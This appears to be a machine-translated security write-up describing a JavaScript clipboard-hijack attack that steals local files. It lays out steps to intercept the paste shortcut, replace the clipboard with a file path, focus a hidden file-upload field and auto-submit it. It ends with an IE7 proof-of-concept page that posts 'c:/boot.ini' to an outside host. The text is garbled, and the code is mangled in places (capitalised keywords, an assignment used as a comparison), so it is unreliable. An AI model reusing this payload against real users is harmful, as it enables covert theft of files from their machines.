Javascript Paste Keyboard Shortcuts Hijack

Author: kj021320

Team: I .S. T. O

Such an attack means is extremely shameless and extremely cumbersome! Therefore, defense measures must be well performed.

What can I do with Javascript Paste Keyboard Shortcuts Hijack ??? Can read any files on your local machine! That's right! That is to say, after you add any XSS and press the paste shortcut key, you may be read by others to any file on your machine!

So what is going on? OK.

First, we know that JS has no permission to read any local files. So we must have users upload their own files!

How can users upload files? Very easy! You can use <input type = file> to upload files!

Another problem now is that when input is file, the value cannot be set in the code! You must enter this information by yourself! Human-Computer Interaction is required!

Actually speaking of this! Smart, you should also understand what's going on! Next, let's talk about it! Users cannot enter their files and submit them to you?

Yes ~ Then wait for the user to paste the shortcut key ~~ Steps

1. Determine whether to perform ctrl + v

2. Replace the clipboard

3. Switch the cursor to File Upload

4. Leave the aftermath to you (for example, how to make the upload textbox transparent, the current page will not jump due to form submission)

POC in IE7:

<HTML>
<HEAD>
<TITLE> Javascript Paste Keyboard Shortcuts Hijack </TITLE>
</HEAD>

<Body onkeydown = "temp ()">
<Input>
<Form action = "http://www.kj.com" method = post name = s>
<Input id = kj_filehijack type = file name = fhijack>
</Form>
<Script>
Function temp ()
{
If (event. ctrlKey ){
If (event. keyCode = 86 ){
Window. clipboardData. setData ("text", "c:/boot. ini ");
Document. getElementById (kj_filehijack). focus ();
Document. s. submit ();
}
}
}
</Script>

</BODY>
</HTML>